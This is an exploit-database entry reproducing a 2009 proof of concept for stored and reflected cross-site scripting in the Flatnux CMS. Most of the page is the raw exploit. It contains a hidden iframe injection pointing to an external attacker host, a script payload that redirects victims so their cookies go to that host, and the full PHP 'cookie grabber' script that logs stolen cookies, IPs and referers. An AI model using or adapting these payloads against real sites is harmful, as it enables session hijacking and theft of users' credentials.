header-logo
Suggest Exploit
vendor:
Flatnux
by:
milw0rm.com
7.5
CVSS
HIGH
Cross-site Scripting (XSS)/Iframe injection
79
CWE
Product Name: Flatnux
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Flatnux-2009-01-27 XSS/Iframe injection p0c

A vulnerability in Flatnux allows an attacker to inject an iframe into the Job field of a user profile. This iframe can be used to execute malicious JavaScript code in the context of the vulnerable website. The malicious code can be used to steal cookies and other sensitive information from the user's browser.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the Job field.
Source

Exploit-DB raw data:

/* 
  - Flatnux-2009-01-27 XSS/Iframe injection p0c
  + 1] Create acount 
  + 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
       - Set iframe in the Job fields       
         (Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>) 
  + 3] Now m4k3 frieNdship witch Sheep

  Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P 
              and Biggest 4 g0rion l0l

  "... droga jest ważniejsza od celu .... :P"
  http://www.wrzuta.pl/audio/iL4UkPk6YK/
  Alfons Luja 
*/       
            

<script type="text/javascript">
          path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
          location.href =  path;
</script>


/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
  if(isset($_GET['kuka'])){
     $gethim = $_GET['kuka'];
     $data = "KUKI_GRABER:\n";
     $data.= date("dmY H:i:s")."\n";
     $data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n";
     $data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n";
     $data.= "CIACHO: ".$gethim."\n";
     $hnd = fopen("KUKI_FLATNUX.TXT","a");
      if(!hnd) exit(666);
         flock($hnd,LOCK_EX);
         fwrite($hnd,$data);
         flock($hnd,LOCK_UN);
         fclose($hnd);
  }
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/

# milw0rm.com [2009-02-02]

Navigation

Suggest Exploit

Services By CQR